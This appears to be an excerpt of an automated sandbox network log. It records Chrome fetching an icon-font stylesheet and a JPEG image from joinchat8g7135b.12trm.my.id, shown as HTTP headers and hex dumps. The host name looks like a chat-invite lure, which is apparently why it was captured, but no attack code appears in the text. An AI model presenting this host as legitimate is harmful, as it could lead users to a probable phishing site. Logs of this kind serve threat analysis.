                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q63LUHJDS1JH1XyJ19R4M216h%2FwX6G2%2Fd0Mozc2IMQzCldWry%2BnlldmM7HFXTmLaeaBSXKe%2F2nHo4CpE%2FGg0kHAZMIu8xPhrlOqOL1ixXENdL%2BabttDPkWyfy1mTb9ERjroxJIl7"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                          Strict-Transport-Security: max-age=15780000
                          Server: cloudflare
                          CF-RAY: 88a972c11bf04366-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:14 UTC430INData Raw: 37 63 30 35 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 61 74 65 72 69 61 6c 2d 44 65 73 69 67 6e 2d 49 63 6f 6e 69 63 2d 46 6f 6e 74 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 4d 61 74 65 72 69 61 6c 2d 44 65 73 69 67 6e 2d 49 63 6f 6e 69 63 2d 46 6f 6e 74 2e 77 6f 66 66 32 3f 76 3d 32 2e 31 2e 30 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 4d 61 74 65 72 69 61 6c 2d 44 65 73 69 67 6e 2d 49 63 6f 6e 69 63 2d 46 6f 6e 74 2e 77 6f 66 66 3f 76 3d 32 2e 31 2e 30 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 4d 61 74 65 72 69 61 6c 2d 44 65 73 69 67 6e 2d 49 63 6f 6e 69 63 2d 46 6f 6e 74 2e 74 74 66 3f 76 3d 32 2e 31 2e 30
                          Data Ascii: 7c05@font-face{font-family:Material-Design-Iconic-Font;src:url(../fonts/Material-Design-Iconic-Font.woff2?v=2.1.0) format('woff2'),url(../fonts/Material-Design-Iconic-Font.woff?v=2.1.0) format('woff'),url(../fonts/Material-Design-Iconic-Font.ttf?v=2.1.0
                          2024-05-27 22:30:14 UTC1369INData Raw: 69 61 6c 69 61 73 65 64 3b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 7d 2e 7a 6d 64 69 2d 68 63 2d 6c 67 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 33 33 33 33 33 33 33 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 2e 37 35 65 6d 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 2d 31 35 25 7d 2e 7a 6d 64 69 2d 68 63 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 7a 6d 64 69 2d 68 63 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 7a 6d 64 69 2d 68 63 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 65 6d 7d 2e 7a 6d 64 69 2d 68 63 2d 35 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 35 65 6d 7d 2e 7a 6d 64 69 2d 68 63 2d 66 77 7b 77 69 64 74 68 3a 31 2e 32 38 35 37 31 34 32 39 65 6d 3b 74 65 78 74
                          Data Ascii: ialiased;-moz-osx-font-smoothing:grayscale}.zmdi-hc-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.zmdi-hc-2x{font-size:2em}.zmdi-hc-3x{font-size:3em}.zmdi-hc-4x{font-size:4em}.zmdi-hc-5x{font-size:5em}.zmdi-hc-fw{width:1.28571429em;text
                          2024-05-27 22:30:14 UTC1369INData Raw: 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 33 35 39 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 7a 6d 64 69 2d 73 70 69 6e 2d 72 65 76 65 72 73 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 33 35 39 64 65 67 29 7d 7d 2e 7a 6d 64 69 2d 68 63 2d 72 6f
                          Data Ascii: g);transform:rotate(0deg)}100%{-webkit-transform:rotate(-359deg);transform:rotate(-359deg)}}@keyframes zmdi-spin-reverse{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(-359deg);transform:rotate(-359deg)}}.zmdi-hc-ro
                          2024-05-27 22:30:14 UTC1369INData Raw: 2d 63 68 65 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 30 38 27 7d 2e 7a 6d 64 69 2d 61 73 73 69 67 6e 6d 65 6e 74 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 30 39 27 7d 2e 7a 6d 64 69 2d 61 73 73 69 67 6e 6d 65 6e 74 2d 72 65 74 75 72 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 30 61 27 7d 2e 7a 6d 64 69 2d 61 73 73 69 67 6e 6d 65 6e 74 2d 72 65 74 75 72 6e 65 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 30 62 27 7d 2e 7a 6d 64 69 2d 61 73 73 69 67 6e 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 30 63 27 7d 2e 7a 6d 64 69 2d 61 74 74 61 63 68 6d 65 6e 74 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 30 64 27 7d 2e 7a 6d
                          Data Ascii: -check:before{content:'\f108'}.zmdi-assignment-o:before{content:'\f109'}.zmdi-assignment-return:before{content:'\f10a'}.zmdi-assignment-returned:before{content:'\f10b'}.zmdi-assignment:before{content:'\f10c'}.zmdi-attachment-alt:before{content:'\f10d'}.zm
                          2024-05-27 22:30:14 UTC1369INData Raw: 2d 63 61 73 65 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 32 62 27 7d 2e 7a 6d 64 69 2d 63 61 73 65 2d 70 6c 61 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 32 63 27 7d 2e 7a 6d 64 69 2d 63 61 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 32 64 27 7d 2e 7a 6d 64 69 2d 63 61 73 74 2d 63 6f 6e 6e 65 63 74 65 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 32 65 27 7d 2e 7a 6d 64 69 2d 63 61 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 32 66 27 7d 2e 7a 6d 64 69 2d 63 68 61 72 74 2d 64 6f 6e 75 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 33 30 27 7d 2e 7a 6d 64 69 2d 63 68 61 72 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e
                          Data Ascii: -case-download:before{content:'\f12b'}.zmdi-case-play:before{content:'\f12c'}.zmdi-case:before{content:'\f12d'}.zmdi-cast-connected:before{content:'\f12e'}.zmdi-cast:before{content:'\f12f'}.zmdi-chart-donut:before{content:'\f130'}.zmdi-chart:before{conten
                          2024-05-27 22:30:14 UTC1369INData Raw: 31 34 61 27 7d 2e 7a 6d 64 69 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 69 74 65 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 34 62 27 7d 2e 7a 6d 64 69 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 6d 75 73 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 34 63 27 7d 2e 7a 6d 64 69 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 70 64 66 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 34 64 27 7d 2e 7a 6d 64 69 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 70 6c 75 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 34 65 27 7d 2e 7a 6d 64 69 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 73 70 65 61 6b 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 34 66 27 7d 2e 7a 6d 64 69 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 74 65 78 74 3a
                          Data Ascii: 14a'}.zmdi-collection-item:before{content:'\f14b'}.zmdi-collection-music:before{content:'\f14c'}.zmdi-collection-pdf:before{content:'\f14d'}.zmdi-collection-plus:before{content:'\f14e'}.zmdi-collection-speaker:before{content:'\f14f'}.zmdi-collection-text:
                          2024-05-27 22:30:14 UTC1369INData Raw: 36 64 27 7d 2e 7a 6d 64 69 2d 66 75 6e 63 74 69 6f 6e 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 36 65 27 7d 2e 7a 6d 64 69 2d 67 61 73 2d 73 74 61 74 69 6f 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 36 66 27 7d 2e 7a 6d 64 69 2d 67 65 73 74 75 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 37 30 27 7d 2e 7a 6d 64 69 2d 67 6c 6f 62 65 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 37 31 27 7d 2e 7a 6d 64 69 2d 67 6c 6f 62 65 2d 6c 6f 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 37 32 27 7d 2e 7a 6d 64 69 2d 67 6c 6f 62 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 37 33 27 7d 2e 7a 6d 64 69 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70
                          Data Ascii: 6d'}.zmdi-functions:before{content:'\f16e'}.zmdi-gas-station:before{content:'\f16f'}.zmdi-gesture:before{content:'\f170'}.zmdi-globe-alt:before{content:'\f171'}.zmdi-globe-lock:before{content:'\f172'}.zmdi-globe:before{content:'\f173'}.zmdi-graduation-cap
                          2024-05-27 22:30:14 UTC1369INData Raw: 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 39 31 27 7d 2e 7a 6d 64 69 2d 6d 61 69 6c 2d 72 65 70 6c 79 2d 61 6c 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 39 32 27 7d 2e 7a 6d 64 69 2d 6d 61 69 6c 2d 72 65 70 6c 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 39 33 27 7d 2e 7a 6d 64 69 2d 6d 61 69 6c 2d 73 65 6e 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 39 34 27 7d 2e 7a 6d 64 69 2d 6d 61 6c 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 39 35 27 7d 2e 7a 6d 64 69 2d 6d 61 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 39 36 27 7d 2e 7a 6d 64 69 2d 6d 65 6e 75 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 39 37 27 7d 2e 7a 6d 64 69 2d 6d
                          Data Ascii: :before{content:'\f191'}.zmdi-mail-reply-all:before{content:'\f192'}.zmdi-mail-reply:before{content:'\f193'}.zmdi-mail-send:before{content:'\f194'}.zmdi-mall:before{content:'\f195'}.zmdi-map:before{content:'\f196'}.zmdi-menu:before{content:'\f197'}.zmdi-m
                          2024-05-27 22:30:14 UTC1369INData Raw: 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 62 35 27 7d 2e 7a 6d 64 69 2d 72 65 66 72 65 73 68 2d 73 79 6e 63 2d 61 6c 65 72 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 62 36 27 7d 2e 7a 6d 64 69 2d 72 65 66 72 65 73 68 2d 73 79 6e 63 2d 6f 66 66 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 62 37 27 7d 2e 7a 6d 64 69 2d 72 65 66 72 65 73 68 2d 73 79 6e 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 62 38 27 7d 2e 7a 6d 64 69 2d 72 65 66 72 65 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 62 39 27 7d 2e 7a 6d 64 69 2d 72 6f 6c 6c 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 62 61 27 7d 2e 7a 6d 64 69 2d 72 75 6c 65 72 3a 62 65 66 6f 72 65 7b 63 6f
                          Data Ascii: t:before{content:'\f1b5'}.zmdi-refresh-sync-alert:before{content:'\f1b6'}.zmdi-refresh-sync-off:before{content:'\f1b7'}.zmdi-refresh-sync:before{content:'\f1b8'}.zmdi-refresh:before{content:'\f1b9'}.zmdi-roller:before{content:'\f1ba'}.zmdi-ruler:before{co
                          2024-05-27 22:30:14 UTC1369INData Raw: 31 64 36 27 7d 2e 7a 6d 64 69 2d 74 61 62 2d 75 6e 73 65 6c 65 63 74 65 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 64 37 27 7d 2e 7a 6d 64 69 2d 74 61 62 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 64 38 27 7d 2e 7a 6d 64 69 2d 74 61 67 2d 63 6c 6f 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 64 39 27 7d 2e 7a 6d 64 69 2d 74 61 67 2d 6d 6f 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 64 61 27 7d 2e 7a 6d 64 69 2d 74 61 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 64 62 27 7d 2e 7a 6d 64 69 2d 74 68 75 6d 62 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 64 63 27 7d 2e 7a 6d 64 69 2d 74 68 75 6d 62 2d 75 70 2d 64 6f 77 6e 3a 62 65 66
                          Data Ascii: 1d6'}.zmdi-tab-unselected:before{content:'\f1d7'}.zmdi-tab:before{content:'\f1d8'}.zmdi-tag-close:before{content:'\f1d9'}.zmdi-tag-more:before{content:'\f1da'}.zmdi-tag:before{content:'\f1db'}.zmdi-thumb-down:before{content:'\f1dc'}.zmdi-thumb-up-down:bef


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.449745188.114.96.34435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:14 UTC642OUTGET /vhsfhqpdhdsih6/img/maria.jpg HTTP/1.1
                          Host: joinchat8g7135b.12trm.my.id
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:14 UTC678INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:14 GMT
                          Content-Type: image/jpeg
                          Content-Length: 57874
                          Connection: close
                          Last-Modified: Thu, 25 Aug 2022 04:34:44 GMT
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 5218
                          Accept-Ranges: bytes
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IwX6v%2FBPSgAY7GchU2qzoOW2trZi47tcAX9Eg4ijuBn0lsVht8K03FSfkTkjOUr%2Fc3rFLtNkelcU4lzMOVkIvTytkFLhX3CAurMo2N8bJZDMrQ7%2Bc8UK4gEEbEqdXcw%2FxoEhVC5ddB0esYj6qEs%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972c28d147ce7-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:14 UTC691INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0b 0b 09 0c 11 0f 12 12 11 0f 11 11 13 16 1c 17 13 14 1a 15 11 11 18 21 18 1a 1d 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c2 00 11 08 02 01 03 24 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 06 00 07 ff c4 00 19 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 a3 99 0f 51 59 ee d5 26
                          Data Ascii: JFIFC!"$"$C$"QY&
                          2024-05-27 22:30:14 UTC1369INData Raw: 61 07 17 80 bf a1 be da 39 5a 70 9b 22 47 65 54 91 e4 c5 d2 6d 9d 1e c2 1b de d7 45 72 2f 03 00 6c 9b 23 79 d4 68 55 52 e0 b1 06 a3 51 b1 8d 23 51 21 91 a3 c9 66 7a 47 0b d0 62 67 45 4b d1 ec 3c c6 c4 8d d4 ca 7d 2b 59 4c 8e e0 97 97 9f 58 5b 5e 46 57 20 08 df 4d 6d a0 ae 92 cd 6c 29 ee 66 c3 59 63 5d 3a 67 8c 28 79 dd 94 83 ca 26 37 9b fa 4e 0e 8a 97 bc 29 49 d8 e1 ad 87 1b 5f 96 f4 b9 ac f4 3d ad 6d 2a 1c 95 ec 28 d3 ae 03 24 46 49 10 aa 68 04 b3 32 de cb 5b 4e 7d b1 f3 8f 4a f3 6f 53 15 96 6a f7 cf f4 98 3e 95 91 da c8 ee 6a 68 95 bc 8d 3f 91 41 3b 90 1f cd e4 9e d4 e0 ee 44 05 e6 73 3c fb d6 3c bb d4 1e 7d 3e bc ec b8 e6 bb 2d 2b 27 40 b0 a9 28 c8 29 ac 25 dd 0d f6 d1 d2 63 49 15 f2 2a 63 a5 14 79 11 f5 ce fc e3 26 5a 77 77 23 9a a1 0a af 1e bc c7 d5
                          Data Ascii: a9Zp"GeTmEr/l#yhURQ#Q!fzGbgEK<}+YLX[^FW Mml)fYc]:g(y&7N)I_=m*($FIh2[N}JoSj>jh?A;Ds<<}>-+'@()%cI*cy&Zww#
                          2024-05-27 22:30:14 UTC1369INData Raw: 1c 81 d4 51 d9 01 3c f6 53 d3 29 5c e0 7b 43 9c ac 53 db fc cf d2 74 c1 b5 d6 19 fb 8d 1d 79 d2 95 4c 4b c8 e9 5a c4 9b 0c 72 65 84 a9 d3 c9 8b 3b 3d 25 96 2a 8e 92 b2 e0 39 e9 38 7d 37 4c 87 43 7d 46 2d 2d 0d e5 4e 99 c5 c8 dc 55 e5 a4 04 4e e7 ec 97 7b 9b d7 39 aa ae 2c 74 ee 37 f9 6d 06 b8 d6 12 97 62 94 7c 1d c5 14 e8 ed 55 46 c6 a1 f1 4f 53 b4 59 9e 8a ea b3 73 54 6d 39 19 c3 73 c2 e4 cf cd 74 d7 23 9a 86 42 99 9a 4e d6 6e 5b 4a 07 e4 4a 4b cc e0 b3 72 26 fc ea 88 f6 5a 55 5c 50 a7 a3 ac 9d 4e 9b 2c ea 6c 43 cb b4 79 ad 0c bb db 2a db 2b 9b d0 18 19 de 75 53 b4 8d 42 2b 33 b8 79 4b 46 35 91 8a 4a bc 3a f6 77 70 27 65 a1 46 e1 2b 6f 00 a3 35 6d c0 6d 60 6e ac f3 53 a4 1d 06 53 44 95 8c 19 15 0e 2b 71 5b 5a 5d 31 d5 db 34 93 8b a9 ed b3 fb e7 2e cb 35
                          Data Ascii: Q<S)\{CStyLKZre;=%*98}7LC}F--NUN{9,t7mb|UFOSYsTm9st#BNn[JJKr&ZU\PN,lCy*+uSB+3yKF5J:wp'eF+o5mm`nSSD+q[Z]14.5
                          2024-05-27 22:30:14 UTC1369INData Raw: 98 ec f4 b5 b7 78 75 31 64 be 6a 0b 2d 64 42 c5 53 7a 88 2b 1f 2f 06 df 1e b9 a3 92 13 eb 29 a6 80 f8 56 11 04 1d 0b 0d 56 52 ff 00 97 be 5c ba 79 52 59 09 a2 ec 8a ab 8a 4b 92 cd 8f d7 64 3a 79 9d 57 63 58 39 97 15 8f 0a a5 1b f9 fa f9 ec 78 ee 42 01 56 6b 32 2c e4 d2 c6 23 2e 2e 9c 16 e9 12 63 10 17 30 a0 4b ad ce ad a4 45 95 a4 a2 b5 f6 97 9a 34 48 e0 14 27 ba 37 67 52 d2 3a 81 29 6c 69 b2 d2 75 ad 25 b3 99 51 56 ae a7 ba 67 67 50 ba 01 b9 f8 aa e3 5c 52 75 9a a8 d4 76 ca 2c ec eb 4d e7 29 c7 a9 b2 d1 bb 70 c2 75 fa 2c 47 80 d5 80 7e 69 b4 c1 6d bc e2 e2 b4 8a 9a e0 c4 47 04 8d 86 5f 75 96 96 d7 55 e0 55 79 05 d1 b0 dd 8c 55 cf 41 55 59 e3 1a cd c0 5b 6e ce 2b 42 bb 43 9e b6 36 e1 9b 1a 33 8d ca 90 c8 50 6a bb 80 51 27 31 2f 39 cc fb 3e 3e b9 f1 8a e4
                          Data Ascii: xu1dj-dBSz+/)VVR\yRYKd:yWcX9xBVk2,#..c0KE4H'7gR:)liu%QVggP\Ruv,M)pu,G~imG_uUUyUAUY[n+BC63PjQ'1/9>>
                          2024-05-27 22:30:14 UTC1369INData Raw: c8 63 a7 9b e6 c8 1c 67 0d 18 e5 da a1 0e cd bd 75 5e 49 51 b6 57 5a 5c de 94 eb 5e 46 2d 21 61 77 d9 0a 3c f6 ee 34 aa ce bb d4 73 7a fc 74 b7 30 cd 72 9c ee 60 d5 c8 ce 72 28 2b da e4 22 35 88 92 1a b8 5d 18 58 41 4e d7 24 e6 8e 91 db 5e 20 92 09 2f 1d 2c 6d 3b 53 f3 e7 ed 31 f9 ad 0d ee 4a fb 8b ba e0 d1 24 2d 24 3c 2f a1 ec 5e 69 95 f6 6c 73 89 6d fe 78 e7 7d c5 2d c2 9a ac 7e b7 23 68 a8 89 29 82 23 16 8f 33 0b 9e c9 75 4d 2a a3 74 3a 32 75 f1 d1 35 3b 83 bd 55 ae 4f 91 ce 08 ac 2c 2d 62 7b e1 ba e2 6a c7 35 a7 23 91 a4 54 50 6d dd 3d a9 3a 41 30 1a e1 29 a0 7a 6e 63 94 02 29 88 9c 10 da b6 5d 2f 5d 70 31 58 df 13 27 b8 43 43 e3 9d b4 35 0c d6 35 1a e4 58 e9 71 da fe be b7 b5 cb d1 d2 0a 6b c8 ac cb d7 eb aa 27 48 9a 9c 77 a1 49 21 ef 6e dc ed 6b da
                          Data Ascii: cgu^IQWZ\^F-!aw<4szt0r`r(+"5]XAN$^ /,m;S1J$-$</^ilsmx}-~#h)#3uM*t:2u5;UO,-b{j5#TPm=:A0)znc)]/]p1X'CC55Xqk'HwI!nk
                          2024-05-27 22:30:14 UTC1369INData Raw: a7 00 8e 20 0a 63 61 23 53 58 85 00 24 a7 84 ab 18 53 79 3a f8 6e 6a ba 70 5b 50 e9 05 02 87 ab 91 58 16 5c 99 00 d0 33 42 d4 1c 63 44 de d6 8d 3d 7e 4e cc 59 dd 7b 1a cb 97 30 4c 4c 88 35 42 a1 25 84 32 58 f3 43 97 d6 d4 b9 aa 76 97 95 82 1e 57 55 e7 aa e8 74 15 3b 58 36 15 f6 f0 86 7b e8 73 f8 fa d5 8f 12 a1 c7 3c 60 8b 06 54 2b 9b 93 0e cf b7 84 12 c6 a3 75 35 cb 11 e7 ec db 63 25 8d 9c 88 4e 72 23 8a 04 09 e5 ab 59 76 dd 54 58 73 d4 52 25 ab d8 d9 6b 14 bc d5 54 0d 31 5a c5 03 7e 26 60 d3 5f 01 ac fa d8 c4 40 dc 3e 4e 51 60 70 ac fa b3 99 bd 8a 51 74 a0 2c 93 00 a6 c3 8a 8b 5e ab 9e 05 6f 70 45 0d 87 0a 1c c6 44 65 f5 85 05 ff 00 2f 50 da d6 46 8f 8f 29 96 63 c5 a3 c9 de 66 1c 53 6f ce f6 b5 8d 15 a3 68 8a d1 a2 08 d1 b0 6f d6 63 a4 45 08 5b 6c b8 41
                          Data Ascii: ca#SX$Sy:njp[PX\3BcD=~NY{0LL5B%2XCvWUt;X6{s<`T+u5c%Nr#YvTXsR%kT1Z~&`_@>NQ`pQt,^opEDe/PF)cfSohocE[lA
                          2024-05-27 22:30:14 UTC1369INData Raw: b7 29 c8 1e 95 08 9e b3 ad 7c b2 0e 1f a4 b8 cf ce be c7 eb 1d ee f7 ff 00 1a 5d 62 4a 9b c3 8d aa 13 2d 8a 37 02 c2 a3 86 57 fd 98 f6 ef a3 d8 c5 e4 22 e4 6a 7a db 75 b9 75 6d 83 8a db 2b 65 23 73 7d ba af bf 4e e4 ab 6e 7d 08 32 ba 95 86 16 3d 53 a7 87 32 ab 7c 86 9d 37 33 f5 29 53 f2 16 83 3c 96 41 a1 07 b9 61 cf 7e 12 13 e1 bc c1 1a c5 50 72 ab 8b 68 b6 6b f7 00 11 bd f2 83 2c a4 f2 b7 2b c5 5d 39 7f 6e ef 0c de d9 c7 59 7d 27 39 59 3f c8 74 6a e9 36 22 3f 55 74 73 85 f9 ef b3 d2 99 ac 2c 4e 9f 98 8b 4d ce 32 16 f5 e2 e2 60 d4 5e ea 57 ec d0 51 d6 2d 07 b0 9c 39 35 cb c6 74 fa 4d b7 2d 3f 65 5c 14 f5 ec 8f b7 19 da 60 e0 69 ca 0e 15 57 c3 f9 6d 3e 7a 45 7e 9e 0c a7 b1 fb 6c c8 1f 6a 2f da 83 c3 8f b6 ff 00 fb 4e f4 ae cb 26 e3 0d 18 8a 3d 22 9e 6b a4
                          Data Ascii: )|]bJ-7W"jzuum+e#s}Nn}2=S2|73)S<Aa~Prhk,+]9nY}'9Y?tj6"?Uts,NM2`^WQ-95tM-?e\`iWm>zE~lj/N&="k
